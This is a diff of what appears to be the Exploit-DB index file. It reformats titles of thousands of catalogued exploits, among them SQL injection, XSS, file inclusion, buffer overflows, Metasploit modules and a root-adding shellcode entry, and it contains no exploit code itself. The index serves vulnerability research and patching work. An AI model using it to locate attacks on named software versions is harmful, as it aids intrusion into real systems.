 12455,platforms/php/webapps/12455.txt,"Ucenter Projekt 2.0 - Insecure crossdomain (XSS)",2010-04-29,indoushka,php,webapps,0
 12456,platforms/php/webapps/12456.txt,"chCounter indirect SQL Injection and XSS Vulnerabilities",2010-04-29,Valentin,php,webapps,0
 12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 - (Win32) CSS Remote Denial of Service Exploit",2010-04-29,ITSecTeam,windows,dos,0
-12458,platforms/php/webapps/12458.txt,"Scratcher (SQL/XSS) Multiple Remote",2010-04-29,"cr4wl3r ",php,webapps,0
+12458,platforms/php/webapps/12458.txt,"Scratcher - (SQL/XSS) Multiple Remote",2010-04-29,"cr4wl3r ",php,webapps,0
 12459,platforms/php/webapps/12459.txt,"ec21 clone 3.0 - (id) SQL Injection",2010-04-30,v3n0m,php,webapps,0
 12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection",2010-04-30,v3n0m,php,webapps,0
 12461,platforms/php/webapps/12461.txt,"JobPost - SQLi",2010-04-30,Sid3^effects,php,webapps,0
@@ -11443,7 +11443,7 @@ id,file,description,date,author,platform,type,port
 12542,platforms/php/webapps/12542.rb,"phpscripte24 Shop System SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0
 12543,platforms/php/webapps/12543.rb,"Alibaba Clone <= 3.0 (Special) - SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0
 12544,platforms/php/webapps/12544.rb,"Alibaba Clone Diamond Version - SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0
-12545,platforms/php/webapps/12545.rb,"phpscripte24 Live Shopping Multi Portal System SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0
+12545,platforms/php/webapps/12545.rb,"phpscripte24 Live Shopping Multi Portal System - SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0
 12546,platforms/windows/dos/12546.pl,"Hyplay 1.2.326.1 - (.asx) Local DoS Crash PoC",2010-05-10,"Steve James",windows,dos,0
 12547,platforms/php/webapps/12547.txt,"e-webtech (new.asp?id=) SQL Injection",2010-05-10,protocol,php,webapps,0
 12550,platforms/php/webapps/12550.pl,"Netvidade engine 1.0 - Multiple Vulnerabilities",2010-05-10,pwndomina,php,webapps,0
@@ -11478,7 +11478,7 @@ id,file,description,date,author,platform,type,port
 12580,platforms/windows/remote/12580.txt,"miniwebsvr 0.0.10 - Directory Traversal/Listing Exploits",2010-05-12,Dr_IDE,windows,remote,0
 12581,platforms/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
 12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
-12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection",2010-05-12,FL0RiX,php,webapps,0
+12583,platforms/php/webapps/12583.txt,"e-webtech - (fixed_page.asp) SQL Injection",2010-05-12,FL0RiX,php,webapps,0
 12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload",2010-05-12,eidelweiss,php,webapps,0
 12585,platforms/php/webapps/12585.txt,"4Images <= 1.7.7 - (image_utils.php) Remote Command Execution",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0
 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection Exploit",2010-05-13,Cryptovirus,php,webapps,0
@@ -11642,7 +11642,7 @@ id,file,description,date,author,platform,type,port
 12762,platforms/freebsd/dos/12762.txt,"FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos,0
 12763,platforms/php/webapps/12763.txt,"Script Upload Up Your Shell (Sql Inject)",2010-05-27,MouDy-Dz,php,webapps,0
 12766,platforms/php/webapps/12766.txt,"PPhlogger <= 2.2.5 - (trace.php) Remote Command Execution",2010-05-27,"Sn!pEr.S!Te Hacker",php,webapps,0
-12767,platforms/php/webapps/12767.txt,"parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0
+12767,platforms/php/webapps/12767.txt,"parlic Design - (SQL/XSS/HTML) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0
 14321,platforms/windows/remote/14321.html,"Image22 ActiveX 1.1.1 - Buffer Overflow Exploit",2010-07-10,blake,windows,remote,0
 12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script SQL Injection",2010-05-27,Mr.P3rfekT,php,webapps,0
 12769,platforms/php/webapps/12769.txt,"Joomla Component MediQnA 1.1 - LFI",2010-05-27,kaMtiEz,php,webapps,0
@@ -11664,7 +11664,7 @@ id,file,description,date,author,platform,type,port
 12788,platforms/php/webapps/12788.txt,"Marketing Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0
 12790,platforms/php/webapps/12790.txt,"Nucleus Plugin Twitter Remote File Inclusion",2010-05-29,AntiSecurity,php,webapps,0
 12791,platforms/php/webapps/12791.txt,"Aim Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0
-12792,platforms/php/webapps/12792.txt,"MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0
+12792,platforms/php/webapps/12792.txt,"MileHigh Creative - (SQL/XSS/HTML Injection) Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0
 12793,platforms/php/webapps/12793.txt,"Cosmos Solutions CMS SQL Injection",2010-05-29,cyberlog,php,webapps,0
 12794,platforms/php/webapps/12794.txt,"Cosmos Solutions CMS SQL Injection (id= / page=)",2010-05-29,gendenk,php,webapps,0
 12796,platforms/php/webapps/12796.txt,"Joomla Component BF Quiz SQL Injection Exploit",2010-05-29,"Valentin Hoebel",php,webapps,0
@@ -11674,7 +11674,7 @@ id,file,description,date,author,platform,type,port
 12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow",2010-05-30,sinn3r,windows,local,0
 12804,platforms/multiple/remote/12804.txt,"nginx http server <= 0.6.36 - Path Draversal",2010-05-30,"cp77fk4r ",multiple,remote,0
 12805,platforms/php/webapps/12805.txt,"Zeeways Script - Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0
-12806,platforms/php/webapps/12806.txt,"CMScout (XSS/HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0
+12806,platforms/php/webapps/12806.txt,"CMScout - (XSS/HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0
 12807,platforms/php/webapps/12807.txt,"Creato Script SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps,0
 12808,platforms/php/webapps/12808.txt,"PTC Site's RCE/XSS",2010-05-30,CrazyMember,php,webapps,0
 12809,platforms/php/webapps/12809.txt,"Symphony CMS Local File Inclusion",2010-05-30,AntiSecurity,php,webapps,0
@@ -12326,7 +12326,7 @@ id,file,description,date,author,platform,type,port
 13990,platforms/asp/webapps/13990.txt,"Boat Classifieds SQL Injection",2010-06-22,Sangteamtham,asp,webapps,0
 13991,platforms/php/webapps/13991.txt,"Softbiz PHP FAQ Script Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0
 13992,platforms/php/webapps/13992.txt,"Pre PHP Classifieds SQL Injection",2010-06-22,Sangteamtham,php,webapps,0
-13993,platforms/php/webapps/13993.txt,"k-search (SQL/XSS) Multiple Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0
+13993,platforms/php/webapps/13993.txt,"k-search - (SQL/XSS) Multiple Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0
 14512,platforms/php/webapps/14512.txt,"Concept E-commerce SQL Injection",2010-07-31,gendenk,php,webapps,0
 13995,platforms/asp/webapps/13995.txt,"Boat Classifieds (printdetail.asp?Id) SQL Injection",2010-06-23,CoBRa_21,asp,webapps,0
 13996,platforms/php/webapps/13996.txt,"Pre Multi-Vendor Shopping Malls (products.php?sid) SQL Injection",2010-06-23,CoBRa_21,php,webapps,0
@@ -12834,7 +12834,7 @@ id,file,description,date,author,platform,type,port
 14645,platforms/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - (news_id) Remote SQL Injection",2010-08-14,LiquidWorm,php,webapps,0
 14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities PoC",2010-08-14,fdiskyou,windows,dos,0
 14647,platforms/php/webapps/14647.php,"PHP-Fusion Local File Inclusion",2010-08-15,MoDaMeR,php,webapps,0
-14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0
+14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP - (XSS/HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0
 14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 - SEH Buffer Overflow",2010-08-15,dijital1,windows,local,0
 14650,platforms/php/webapps/14650.html,"Zomplog CMS 3.9 - Multiple XSS/CSRF Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0
 14654,platforms/php/webapps/14654.php,"CMSQLite <= 1.2 & CMySQLite <= 1.3.1 - Remote Code Execution Exploit",2010-08-15,BlackHawk,php,webapps,0
@@ -12971,7 +12971,7 @@ id,file,description,date,author,platform,type,port
 14831,platforms/windows/local/14831.rb,"SnackAmp 3.1.2 - SMP Buffer Overflow (SEH)",2010-08-29,"James Fitts",windows,local,0
 14832,platforms/windows/dos/14832.rb,"SnackAmp 3.1.2 - (.wav) Buffer Overflow (PoC)",2010-08-29,"James Fitts",windows,dos,0
 14833,platforms/php/webapps/14833.txt,"vBulletin 3.8.4 & 3.8.5 Registration Bypass",2010-08-29,"Immortal Boy",php,webapps,0
-14834,platforms/php/webapps/14834.txt,"Max's Guestbook (HTML Injection/XSS) Multiple Vulnerabilities",2010-08-29,"MiND C0re",php,webapps,0
+14834,platforms/php/webapps/14834.txt,"Max's Guestbook - (HTML Injection/XSS) Multiple Vulnerabilities",2010-08-29,"MiND C0re",php,webapps,0
 14835,platforms/php/webapps/14835.txt,"Multi-lingual E-Commerce System 0.2 - Multiple Remote File Inclusion Vulnerabilities",2010-08-29,JosS,php,webapps,0
 14837,platforms/php/webapps/14837.txt,"CF Image Hosting Script 1.3.8 - Remote File Inclusion",2010-08-29,"FoX HaCkEr",php,webapps,0
 14838,platforms/php/webapps/14838.txt,"Seagull 0.6.7 - SQL Injection",2010-08-29,Sweet,php,webapps,0
@@ -12980,7 +12980,7 @@ id,file,description,date,author,platform,type,port
 14841,platforms/php/webapps/14841.txt,"seagull 0.6.7 - Remote File Inclusion",2010-08-30,"FoX HaCkEr",php,webapps,0
 14843,platforms/windows/dos/14843.txt,"Apple QuickTime '_Marshaled_pUnk' Backdoor Param Client-Side Arbitrary Code Execution",2010-08-30,"Ruben Santamarta ",windows,dos,0
 14845,platforms/php/webapps/14845.txt,"Joomla Component (com_picsell) Local File Disclosure",2010-08-30,Craw,php,webapps,0
-14846,platforms/php/webapps/14846.txt,"Joomla Component (com_jefaqpro) Multiple Blind SQL Injection Vulnerabilities",2010-08-31,"Chip d3 bi0s",php,webapps,0
+14846,platforms/php/webapps/14846.txt,"Joomla Component (com_jefaqpro) - Multiple Blind SQL Injection Vulnerabilities",2010-08-31,"Chip d3 bi0s",php,webapps,0
 14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 (viewpost.php) - SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0
 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass (0Day)",2010-09-01,Abysssec,php,webapps,0
 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",2010-09-01,Andre_Corleone,php,webapps,0
@@ -13108,7 +13108,7 @@ id,file,description,date,author,platform,type,port
 15035,platforms/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution",2010-09-18,Abysssec,windows,dos,0
 15037,platforms/php/webapps/15037.html,"CMSimple - CSRF",2010-09-18,Abysssec,php,webapps,0
 15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection 'reviews.php'",2010-09-18,secret,php,webapps,0
-15040,platforms/php/webapps/15040.txt,"Joomla Component (com_restaurantguide) Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0
+15040,platforms/php/webapps/15040.txt,"Joomla Component - (com_restaurantguide) Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0
 15041,platforms/php/webapps/15041.py,"Maian Gallery 2 - Local File Download",2010-09-18,mr_me,php,webapps,0
 15044,platforms/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0
 15046,platforms/php/webapps/15046.txt,"Fashione E-Commerce Webshop Multiple SQL Injection",2010-09-19,secret,php,webapps,0
@@ -13212,7 +13212,7 @@ id,file,description,date,author,platform,type,port
 15186,platforms/ios/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal",2010-10-02,m0ebiusc0de,ios,remote,0
 15188,platforms/ios/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit",2010-10-02,m0ebiusc0de,ios,dos,0
 15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x - (7.2.3925) LDAP Injection",2010-10-02,sqlhacker,asp,webapps,0
-15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret (SQL/XSS) Multiple Vulnerabilities",2010-10-02,KnocKout,asp,webapps,0
+15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret - (SQL/XSS) Multiple Vulnerabilities",2010-10-02,KnocKout,asp,webapps,0
 15194,platforms/php/webapps/15194.txt,"TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload",2010-10-03,Hackeri-AL,php,webapps,0
 15200,platforms/php/webapps/15200.txt,"FAQMasterFlex 1.2 - SQL Injection",2010-10-04,cyb3r.anbu,php,webapps,0
 15201,platforms/windows/local/15201.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH DEP Bypass)",2010-10-04,"Muhamad Fadzil Ramli",windows,local,0
@@ -13693,7 +13693,7 @@ id,file,description,date,author,platform,type,port
 15770,platforms/php/webapps/15770.txt,"Download Center 2.2 - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0
 15771,platforms/php/webapps/15771.txt,"SchuldnerBeratung SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0
 15772,platforms/php/webapps/15772.txt,"PayPal Shop Digital SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0
-15773,platforms/php/webapps/15773.txt,"Projekt Shop (details.php) Multiple SQL Injection Vulnerabilities",2010-12-18,"DeadLy DeMon",php,webapps,0
+15773,platforms/php/webapps/15773.txt,"Projekt Shop - (details.php) Multiple SQL Injection Vulnerabilities",2010-12-18,"DeadLy DeMon",php,webapps,0
 15774,platforms/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 - ACPI custom_method Privilege Escalation",2010-12-18,"Jon Oberheide",linux,local,0
 15775,platforms/php/webapps/15775.txt,"Mafia Game Script SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0
 15776,platforms/asp/webapps/15776.pl,"Virtual Store Open 3.0 Acess SQL Injection",2010-12-18,Br0ly,asp,webapps,0
@@ -13868,7 +13868,7 @@ id,file,description,date,author,platform,type,port
 16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0
 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - (.wav) Buffer Overflow Exploit",2011-01-18,h1ch4m,windows,local,0
 16010,platforms/php/webapps/16010.txt,"allCineVid Joomla Component 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps,0
-16011,platforms/php/webapps/16011.txt,"CakePHP <= 1.3.5 - / 1.2.8 unserialize()",2011-01-18,felix,php,webapps,0
+16011,platforms/php/webapps/16011.txt,"CakePHP <= 1.3.5 / 1.2.8 - unserialize()",2011-01-18,felix,php,webapps,0
 16013,platforms/php/webapps/16013.html,"N-13 News 3.4 - Remote Admin Add CSRF Exploit",2011-01-18,anT!-Tr0J4n,php,webapps,0
 16014,platforms/windows/remote/16014.html,"Novell iPrint <= 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0
 17209,platforms/php/webapps/17209.txt,"SoftMP3 SQL Injection",2011-04-24,mArTi,php,webapps,0
@@ -14001,7 +14001,7 @@ id,file,description,date,author,platform,type,port
 16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
 16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Remote BoF (Post Auth)",2011-02-16,chap0,windows,remote,0
 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent SQL Injection",2011-02-16,R4dc0re,asp,webapps,0
-16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent SQL Injection",2011-02-16,R4dc0re,asp,webapps,0
+16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0
 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - (.csv) Denial of Service",2011-02-17,b0telh0,windows,dos,0
 16181,platforms/php/webapps/16181.txt,"WordPress User Photo Component - Remote File Upload",2011-02-17,ADVtools,php,webapps,0
 16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 - grapheme_extract() NULL Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0
@@ -14126,7 +14126,7 @@ id,file,description,date,author,platform,type,port
 16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd Heap Overflow",2010-04-30,Metasploit,solaris_sparc,remote,0
 16324,platforms/multiple/remote/16324.rb,"Solaris sadmind Command Execution",2010-06-22,Metasploit,multiple,remote,0
 16325,platforms/solaris/remote/16325.rb,"Sun Solaris sadmind adm_build_path() Buffer Overflow",2010-07-03,Metasploit,solaris,remote,0
-16326,platforms/solaris/remote/16326.rb,"Solaris ypupdated Command Execution",2010-07-25,Metasploit,solaris,remote,0
+16326,platforms/solaris/remote/16326.rb,"Solaris - ypupdated Command Execution",2010-07-25,Metasploit,solaris,remote,0
 16327,platforms/solaris/remote/16327.rb,"Solaris in.telnetd TTYPROMPT Buffer Overflow",2010-06-22,Metasploit,solaris,remote,0
 16328,platforms/solaris/remote/16328.rb,"Sun Solaris Telnet Remote Authentication Bypass",2010-06-22,Metasploit,solaris,remote,0
 16329,platforms/solaris/remote/16329.rb,"Samba lsa_io_trans_names Heap Overflow (Solaris)",2010-04-05,Metasploit,solaris,remote,0
@@ -14699,7 +14699,7 @@ id,file,description,date,author,platform,type,port
 16897,platforms/php/webapps/16897.rb,"BASE - base_qry_common Remote File Include",2010-11-24,Metasploit,php,webapps,0
 16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution",2010-07-03,Metasploit,php,webapps,0
 16901,platforms/php/webapps/16901.rb,"PAJAX Remote Command Execution",2010-04-30,Metasploit,php,webapps,0
-16902,platforms/php/webapps/16902.rb,"CakePHP <= 1.3.5 - / 1.2.8 Cache Corruption Exploit",2011-01-14,Metasploit,php,webapps,0
+16902,platforms/php/webapps/16902.rb,"CakePHP <= 1.3.5 / 1.2.8 - Cache Corruption Exploit",2011-01-14,Metasploit,php,webapps,0
 16903,platforms/php/remote/16903.rb,"OpenX banner-edit.php File Upload PHP Code Execution",2010-09-20,Metasploit,php,remote,0
 16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion",2011-01-08,Metasploit,php,webapps,0
 16905,platforms/cgi/webapps/16905.rb,"AWStats (6.1-6.2) - configdir Remote Command Execution",2009-12-26,Metasploit,cgi,webapps,0
@@ -15679,7 +15679,7 @@ id,file,description,date,author,platform,type,port
 18047,platforms/php/webapps/18047.txt,"JEEMA Sms 3.2 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
 18048,platforms/php/webapps/18048.txt,"Vik Real Estate 1.0 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
 18049,platforms/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos,0
-18050,platforms/php/webapps/18050.txt,"Joomla HM-Community (com_hmcommunity) Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0
+18050,platforms/php/webapps/18050.txt,"Joomla HM-Community - (com_hmcommunity) Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0
 18051,platforms/windows/remote/18051.txt,"BroadWin WebAccess SCADA/HMI Client Remote Code Execution",2011-10-31,Snake,windows,remote,0
 18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC",2011-10-31,rgod,windows,dos,0
 18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress <= 3.1.4 - Stored XSS",2011-10-31,"Paul Loftness",php,webapps,0
@@ -15770,7 +15770,7 @@ id,file,description,date,author,platform,type,port
 18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) _rOOt_ with password _pwn3d_ shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
 19400,platforms/php/webapps/19400.txt,"WordPress Website FAQ Plugin 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0
 18165,platforms/windows/dos/18165.txt,"siemens automation license manager <= 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0
-18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0
+18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0
 18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin (0Day)",2011-11-28,Alberto_García_Illera,php,webapps,0
 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine Remote Code Execution",2011-11-30,Metasploit,multiple,remote,0
 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 / 4300 - Command Execution",2011-11-30,Metasploit,hardware,remote,0
@@ -15809,7 +15809,7 @@ id,file,description,date,author,platform,type,port
 18212,platforms/php/webapps/18212.txt,"phpBB MyPage Plugin SQL Injection",2011-12-07,CrazyMouse,php,webapps,0
 18213,platforms/php/webapps/18213.php,"Traq <= 2.3 - Authentication Bypass / Remote Code Execution Exploit",2011-12-07,EgiX,php,webapps,0
 18214,platforms/php/webapps/18214.py,"SMF <= 2.0.1 - SQL Injection & Privilege Escalation",2011-12-07,The:Paradox,php,webapps,0
-18220,platforms/windows/dos/18220.py,"CyberLink Multiple Products File Project Handling Stack Buffer Overflow PoC",2011-12-09,modpr0be,windows,dos,0
+18220,platforms/windows/dos/18220.py,"CyberLink Multiple Products - File Project Handling Stack Buffer Overflow PoC",2011-12-09,modpr0be,windows,dos,0
 18221,platforms/linux/dos/18221.c,"Apache HTTP Server Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos,0
 18222,platforms/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection",2011-12-09,Don,php,webapps,0
 18223,platforms/windows/dos/18223.pl,"Free Opener Local Denial of Service",2011-12-09,"Iolo Morganwg",windows,dos,0
@@ -17076,7 +17076,7 @@ id,file,description,date,author,platform,type,port
 19711,platforms/windows/dos/19711.txt,"Ipswitch IMail 5.0.8/6.0/6.1 IMonitor status.cgi DoS",2000-01-05,"Ussr Labs",windows,dos,0
 19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - CFCACHE",2000-01-04,anonymous,multiple,remote,0
 19713,platforms/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 - search.cgi Directory Traversal",2000-01-03,"k0ad k1d",cgi,remote,0
-40086,platforms/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB Code Execution",2016-07-11,Metasploit,ruby,remote,80
+40086,platforms/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution",2016-07-11,Metasploit,ruby,remote,80
 19715,platforms/php/webapps/19715.txt,"WordPress WP-Predict Plugin 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0
 19716,platforms/windows/dos/19716.txt,"Checkpoint Abra - Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",windows,dos,0
 19717,platforms/java/remote/19717.rb,"Java Applet Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,Metasploit,java,remote,0
@@ -17591,8 +17591,8 @@ id,file,description,date,author,platform,type,port
 20255,platforms/windows/dos/20255.txt,"Microsoft Windows NT 4.0 / 2000 LPC Zone Memory Depletion DoS",2000-10-03,"BindView's Razor Team",windows,dos,0
 20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x fstat Format String",2000-10-04,K2,openbsd,local,0
 20257,platforms/windows/local/20257.txt,"Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier - Multiple Vulnerabilities",2000-10-03,"BindView's Razor Team",windows,local,0
-20258,platforms/multiple/remote/20258.c,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (1)",1994-02-07,"Josh D",multiple,remote,0
-20259,platforms/multiple/remote/20259.txt,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (2)",1994-02-07,anonymous,multiple,remote,0
+20258,platforms/multiple/remote/20258.c,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (1)",1994-02-07,"Josh D",multiple,remote,0
+20259,platforms/multiple/remote/20259.txt,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (2)",1994-02-07,anonymous,multiple,remote,0
 20260,platforms/php/webapps/20260.txt,"Islamnt Islam Forum Script 1.2 - Blind SQL Injection Exploit",2012-08-05,s3n4t00r,php,webapps,0
 20543,platforms/windows/local/20543.rb,"Windows Service Trusted Path Privilege Escalation",2012-08-15,Metasploit,windows,local,0
 20500,platforms/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload",2012-08-15,Metasploit,php,remote,0
@@ -17798,7 +17798,7 @@ id,file,description,date,author,platform,type,port
 20468,platforms/multiple/remote/20468.txt,"Inktomi Search Software 3.0 Information Disclosure",2000-12-05,"china nsl",multiple,remote,0
 20469,platforms/unix/remote/20469.txt,"Endymion MailMan 3.0.x - Remote Arbitrary Command Execution",2000-12-06,"Secure Reality Advisories",unix,remote,0
 20470,platforms/windows/dos/20470.txt,"IBM DB2 - Universal Database for Windows NT 6.1/7.1 SQL DoS",2000-12-05,benjurry,windows,dos,0
-21316,platforms/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0
+21316,platforms/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) - Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0
 20472,platforms/multiple/remote/20472.txt,"IBM DB2 - Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password",2000-12-05,benjurry,multiple,remote,0
 20473,platforms/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x_Catalyst 5000 4.5/5.x_Catalyst 6000 5.x Memory Leak DoS",2000-12-06,blackangels,hardware,dos,0
 20474,platforms/php/webapps/20474.txt,"WordPress RSVPMaker 2.5.4 - Persistent XSS",2012-08-13,"Chris Kellum",php,webapps,0
@@ -18135,9 +18135,9 @@ id,file,description,date,author,platform,type,port
 20828,platforms/windows/dos/20828.txt,"SpyNet 6.5 Chat Server Multiple Connection Denial of Service",2001-05-07,nemesystm,windows,dos,0
 20829,platforms/windows/remote/20829.txt,"T. Hauck Jana Server 1.45/1.46 Hex Encoded Directory Traversal",2001-05-07,neme-dhc,windows,remote,0
 20830,platforms/windows/dos/20830.txt,"T. Hauck Jana Server 1.45/1.46/2.0 - MS-DOS Device Name DoS",2001-05-07,neme-dhc,windows,dos,0
-20831,platforms/cgi/remote/20831.txt,"Drummond Miles A1Stats 1.0 a1disp2.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0
-20832,platforms/cgi/remote/20832.txt,"Drummond Miles A1Stats 1.0 a1disp3.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0
-20833,platforms/cgi/remote/20833.txt,"Drummond Miles A1Stats 1.0 a1disp4.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0
+20831,platforms/cgi/remote/20831.txt,"Drummond Miles A1Stats 1.0 - a1disp2.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0
+20832,platforms/cgi/remote/20832.txt,"Drummond Miles A1Stats 1.0 - a1disp3.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0
